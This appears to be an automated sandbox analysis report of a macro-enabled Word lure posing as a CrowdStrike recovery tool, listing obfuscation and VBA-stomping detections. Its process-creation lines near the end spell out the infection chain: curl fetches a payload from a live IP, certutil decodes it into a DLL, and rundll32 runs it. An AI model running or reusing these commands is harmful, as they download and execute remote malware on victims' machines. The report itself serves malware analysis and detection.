Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: VBA code instrumentation

OLE, VBA macro, High number of string operations: Module ThisDocument

Name: ThisDocument

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,

7_2_000000013F4A1D84

PE file contains sections with non-standard names

Source: curl.exe.4.dr

Static PE information: section name: _RDATA

Drops PE files

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\AppData\Local\Temp\curl.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Steps to Recover Hyper-V virtual machines
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Using recovery media on Hyper-V virtual machines
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: ph3330 The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Hyper-V settings
Source: curl.txt.5.dr	Binary or memory string: jQ0qtQUAjVMci0EIQYVBIHQLSIsBSIlE3CBI/8NIg8EQSIPqAXXiRI1CCEiL00yN
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: https://go.microsoft.com/fwlink/?linkid=2280386. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: s Hyper-V settings.
Source: document.xml	Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Hyper-V Settings
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,

7_2_000000013F4A1D84

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4DAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_000000013F4DAFA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F35AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		22_2_000000013F35AFA0

HIPS / PFW / Operating System Protection Evasion

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA stomping: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, VBA stomping: true

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe

